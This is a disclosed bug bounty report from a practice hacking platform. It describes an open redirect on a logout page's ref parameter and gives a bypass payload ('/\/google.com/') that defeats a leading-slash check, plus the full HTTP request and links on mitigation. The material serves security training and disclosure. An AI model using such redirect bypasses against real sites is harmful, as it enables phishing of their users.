FirstBlood-#259 — CWE-601 Open Redirect on GET /drpanel/logout.php via ref param
This issue was discovered on FirstBlood v1
On 2021-05-15, jpdev Level 3 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Summary
The ref= parameter on the logout.php page within the drpanel is vulnerable to an open redirect.
Payload
/\/google.com/
Request
GET /drpanel/logout.php?ref=/\/google.com/ HTTP/1.1
Host: firstbloodhackers.com:49723
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49723/drpanel/index.php
Cookie: drps=1ef2ec2643929e919611d0031
Upgrade-Insecure-Requests: 1
Impact
A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
Additional Reading containing explanation and mitigiations
https://www.bugbountyhunter.com/vulnerability/?type=open_redirect
https://cwe.mitre.org/data/definitions/601.html
https://www.hacksplaining.com/prevention/open-redirects
P4 Low
Endpoint: GET /drpanel/logout.php?
Parameter: ref=
Payload: /\/google.com/
FirstBlood ID: 1
Vulnerability Type: Open Redirect
There is an open url redirect vulnerability on /logout.php. The code expects it to start with / and does not allow to redirect to external domains but this can be bypassed.